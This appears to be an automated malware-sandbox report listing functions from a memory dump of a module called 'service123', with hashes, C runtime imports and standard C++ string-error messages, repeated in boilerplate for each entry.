Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 3e06b313df1e30cfe22da9e5ddaae2e55a7249b62a69d973ee86ef07407f8580
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 80D1C4716083498BDB20CF29C68435BBBE2EFC5348F18C92DE8548BB55D774D9089FA2

Function 6C802EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C803000

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 8872f5b5eac44b8e68a2b020680f03a3d71ea9419734dcf1ab0d6694ae1c6877
Instruction ID: 21889282f526f6e2c440fecbd713cbec296bdd360be13f28d27ddf5618f35ab0
Opcode Fuzzy Hash: 8872f5b5eac44b8e68a2b020680f03a3d71ea9419734dcf1ab0d6694ae1c6877
Instruction Fuzzy Hash: 1E416DB2A0A7108FC724DF1DD98464AFBE4AF99354F15896EE8988B315D330D845CBA2

Function 6C8004E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C800550
memset.MSVCRT ref: 6C800574

Strings

basic_string::_M_replace_aux, xrefs: 6C8005F0

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 1d2d5e37e10539ef9e98ed2383bc8038a8bb0439de026373643d105c6c3e44c4
Instruction ID: 3b2c73cec9b8d0547391badca1860fb1a4d934d0f37332f9bedeecd962d34e30
Opcode Fuzzy Hash: 1d2d5e37e10539ef9e98ed2383bc8038a8bb0439de026373643d105c6c3e44c4
Instruction Fuzzy Hash: 1B318F757097948FC7259F2CDAC062ABBF1AFC6204F148D6EE8989B745D331C844CB52

Function 6C7D35F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C7D3648
memcpy.MSVCRT ref: 6C7D36C1

Part of subcall function 6C7D5340: memcpy.MSVCRT ref: 6C7D53D0

Strings

basic_string::_M_replace_aux, xrefs: 6C7D3670

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: a47eda40ab26c4fe4866e3704e13dd8fbb11777d4d9992cbdfff4eea4979818b
Instruction ID: 7b2f3c1827f58537c3542611f06dc477738e4e06b37b4dba348f0fade08f69ef
Opcode Fuzzy Hash: a47eda40ab26c4fe4866e3704e13dd8fbb11777d4d9992cbdfff4eea4979818b
Instruction Fuzzy Hash: 70213E72A0A3149FC300AF1DD98446EFBF4EB85668F95497EF88897312D371E854CB92

Function 6C78A790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C78A7AD
wcslen.MSVCRT ref: 6C78A7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C78A7D0, 6C78A820

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 76980d315b66894ed7c7f7a29ae3bd981aeddfbed365c7fbbf5a905ae5e0ee4c
Instruction ID: ef5c4714a54c41e7002a81aef399610f0e3342e5311e450c11396291f890b3f6
Opcode Fuzzy Hash: 76980d315b66894ed7c7f7a29ae3bd981aeddfbed365c7fbbf5a905ae5e0ee4c
Instruction Fuzzy Hash: BF1193B1A153148BCB10AF6CD68486ABBF4AF55314F02187DE8C89B311D331D949CB92

Function 6C78A3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C78A3BD
wcslen.MSVCRT ref: 6C78A40D

Strings

basic_string: construction from null is not valid, xrefs: 6C78A3E0, 6C78A430

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 76980d315b66894ed7c7f7a29ae3bd981aeddfbed365c7fbbf5a905ae5e0ee4c
Instruction ID: 2428fb939b88fed8cf58dab2f54b08322ced0466cbd144d91e5670b7f7964739
Opcode Fuzzy Hash: 76980d315b66894ed7c7f7a29ae3bd981aeddfbed365c7fbbf5a905ae5e0ee4c
Instruction Fuzzy Hash: A61163B1A153148BCB10AF6CD68485ABBF4EF55318F42497DE8C89B311D331D959CB92

Function 6C7996A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C79A0BE

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: cedd0ce7161d17abd6517f332cea8eb81dc157d9213e0c2949d72e0a796c2bc5
Instruction ID: 6795eda4ba396f70701d03285dfea9c7069a9f51e36f32ee1a241e9dd00a9f51
Opcode Fuzzy Hash: cedd0ce7161d17abd6517f332cea8eb81dc157d9213e0c2949d72e0a796c2bc5
Instruction Fuzzy Hash: EBA2AE31A053548FEB10CF69D68478DBBF2BF56324F288668D869AB692D730DC45CF80

Function 6C798570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C798F8E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: e756af81d0c81c1029c209951221f6ebeb6ffff6477421111b7273b02e8164ec
Instruction ID: 6f85da65b3d322e25fa179c19c3073b14733f06a81cccea83945b53078209d71
Opcode Fuzzy Hash: e756af81d0c81c1029c209951221f6ebeb6ffff6477421111b7273b02e8164ec
Instruction Fuzzy Hash: 53A29D71A043598FDB10CF69D68478DBBF2BF46324F288669D869AF692C330DC45CB91

Function 6C7D3440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C7D34C0

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: d59e09ea70ff4f0cdb969c1f57f47632c1a4cab8dc9d27ace540ca3c90cdfe75
Instruction ID: 4bbc8615638818ceff97331c8f8ce39ff07e92b9732d0c7e8b1bb7cc8bdbbd86
Opcode Fuzzy Hash: d59e09ea70ff4f0cdb969c1f57f47632c1a4cab8dc9d27ace540ca3c90cdfe75
Instruction Fuzzy Hash: 1D01B5B15093509BC3116F5AC28462BFFF4AF91259F96986DE4DC47711C339E408CB92

Function 6C78A720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C78A73D

Strings

basic_string: construction from null is not valid, xrefs: 6C78A760

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 23c9724abfb08e93a072022896cfe2dae9e0db0cf57f461078467d89de5e2b77
Instruction ID: cd75b31b22c8f7e54bb948ba4baf72c5318345579e2e7f177fba032d0aa64303
Opcode Fuzzy Hash: 23c9724abfb08e93a072022896cfe2dae9e0db0cf57f461078467d89de5e2b77
Instruction Fuzzy Hash: A4F03AB5A153188BCB10EF6CD68485AB7F4AB55318F4258ADE8889B311D232E949CB92

Function 6C78A330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C78A34D

Strings

basic_string: construction from null is not valid, xrefs: 6C78A370

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 23c9724abfb08e93a072022896cfe2dae9e0db0cf57f461078467d89de5e2b77
Instruction ID: 27f211f07608dba7951b2a517b24607aa19cc28ec5a117c68e50d4676f85baf1
Opcode Fuzzy Hash: 23c9724abfb08e93a072022896cfe2dae9e0db0cf57f461078467d89de5e2b77
Instruction Fuzzy Hash: ACF03AB1A153148BCB10EF6CD58485AB7E4AB56318F4258BDE8889B721D232E949CB92

Function 6C7804F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C780550
basic_string::substr, xrefs: 6C780548

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 5779f5b393e866b4c6b0a2232966bf53a7782e3a1c021a75ec836dc9e38babe6
Instruction ID: 19ade2046243cfad3a04890f53fb1e488ad8f51f26210028ec3a518f6acd9eb5
Opcode Fuzzy Hash: 5779f5b393e866b4c6b0a2232966bf53a7782e3a1c021a75ec836dc9e38babe6
Instruction Fuzzy Hash: 9C018BB260A3009FC714CF29C984A9BFBE0ABC9750F10AD6DE488C7700C238D8448B83

Function 6C78C2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C78C318
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C78C320

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: b1c1e89203814baa5e06bf0fa32982f0cf806e098b750a4f4d4758a759d66191
Instruction ID: ae089d7406f113cfb0d0662fb055dd44b69e54ab7951200a351d8f0cef1ef0f5
Opcode Fuzzy Hash: b1c1e89203814baa5e06bf0fa32982f0cf806e098b750a4f4d4758a759d66191
Instruction Fuzzy Hash: 80017871A082109BC704EF2DD98095AFBE5BFDA708F508DADE488DB311D631D849CB86

Function 6C7A4490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0370a3db0a4633fc44d3b09230c543540191dc71bb1b10e87e44573fdf13a756
Instruction ID: 25c069d1dadc807a95d430df70bdc896be47055efdadfdc16f5a8566099a3fe4
Opcode Fuzzy Hash: 0370a3db0a4633fc44d3b09230c543540191dc71bb1b10e87e44573fdf13a756
Instruction Fuzzy Hash: 5682A071E042988FCB10CFE9C58078DBBF1AF45314F288769E865AB796CB35D846DB41

Function 6C7A2A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9bcf4a7d51dbc6372c46baa7e9d287b2d28fda1a6cbf0a51fda2f0fa8917ef
Instruction ID: 85b82a21fafb3ab37eb5dfdd9aeadd25248a90c64055a16932222e684ce9e17e
Opcode Fuzzy Hash: 7c9bcf4a7d51dbc6372c46baa7e9d287b2d28fda1a6cbf0a51fda2f0fa8917ef
Instruction Fuzzy Hash: 1272AE70A09298CFDB11CFE9C68479DBBF1AF09314F148769E4A5ABB92D334D846CB41

Function 6C7A11BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07c4a1e73be572a760740f044e077f45acc7f0978d75ac5bd31d8351f00f6c3
Instruction ID: 8dfbb203dd898b0f5495c9b6c0183b0980c914671afe0015534973a2f76166d7
Opcode Fuzzy Hash: b07c4a1e73be572a760740f044e077f45acc7f0978d75ac5bd31d8351f00f6c3
Instruction Fuzzy Hash: AF726D74A09298CFEB10CFE9C68478DBBF2AF05314F188769D4A5ABB91D334D846CB41

Function 6C7A1E40 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6c87f7167ec7142413b06bfd4a76e49b6fd14e90159231eccf5dd91b8979cc
Instruction ID: f77edb9fb45f700c3a49b72f95bda22fb4b2a30d6b8b64bb5b4232553cfed22c
Opcode Fuzzy Hash: ae6c87f7167ec7142413b06bfd4a76e49b6fd14e90159231eccf5dd91b8979cc
Instruction Fuzzy Hash: DE726D70A09298CFDB15CFEAC68878DBBF1BF09314F148759D4A9ABB91D3349846CB41

Function 6C7A0580 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 772019babeddadae84e1ced1ff413459772400c7f1df7dea6e986dd3e98fa563
Instruction ID: 70fda0e05ec74d0afd3c58f4361eb83906e69c7917888895739b74923875d02c
Opcode Fuzzy Hash: 772019babeddadae84e1ced1ff413459772400c7f1df7dea6e986dd3e98fa563
Instruction Fuzzy Hash: 0B726B70E09298CFDB10CFE9C69478DBBF1AF45314F188B59D4A6AB792C734A846CB41

Function 6C78F510 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C78F663

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 5407ddfee69d37c6714a7cc8b0ad162f01d1ea155793a72169d12accf5a86797
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 25726B74E06258CFCB04CFA8C18459DBBF2BF49314F288669E965AB7A1C735AC41CF51

Function 6C7A77D0 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
